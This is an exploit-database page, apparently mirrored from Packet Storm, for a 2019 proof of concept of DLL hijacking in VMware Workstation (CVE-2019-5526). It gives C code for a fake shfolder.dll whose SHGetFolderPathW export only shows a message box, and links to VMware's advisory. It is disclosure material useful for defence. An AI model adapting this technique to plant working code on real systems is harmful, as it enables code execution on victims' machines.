Lucene search
K

VMware Workstation DLL Hijacking

🗓️ 16 May 2019 00:00:00Reported by Miguel Mendez ZType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 63 Views

VMware Workstation DLL hijacking issue, CVE-2019-5526, Hooking SHGetFolderPathW(

Related
Code
`#---------------------------------------------------------  
# Title: VMware Workstation DLL hijacking < 15.1.0  
# Date: 2019-05-14  
# Author: Miguel Mendez Z. & Claudio Cortes C.  
# Team: www.exploiting.cl  
# Vendor: https://www.vmware.com  
# Version: VMware Workstation Pro / Player (Workstation)  
# Tested on: Windows Windows 7_x86/7_x64 [eng]  
# Cve: CVE-2019-5526  
#---------------------------------------------------------  
  
  
Description:  
  
VMware Workstation contains a DLL hijacking issue because some DLL.  
  
  
DLL Hijacking: shfolder.dll  
Hooking: SHGetFolderPathW()  
  
------Code_Poc-------  
#include "dll.h"  
#include <windows.h>  
  
DLLIMPORT void SHGetFolderPathW()  
{  
MessageBox(0, "s1kr10s", "VMWare-Poc", MB_ICONINFORMATION);  
exit(0);  
}  
  
--------------------------  
  
  
https://www.vmware.com/security/advisories/VMSA-2019-0007.html  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 May 2019 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.0903
63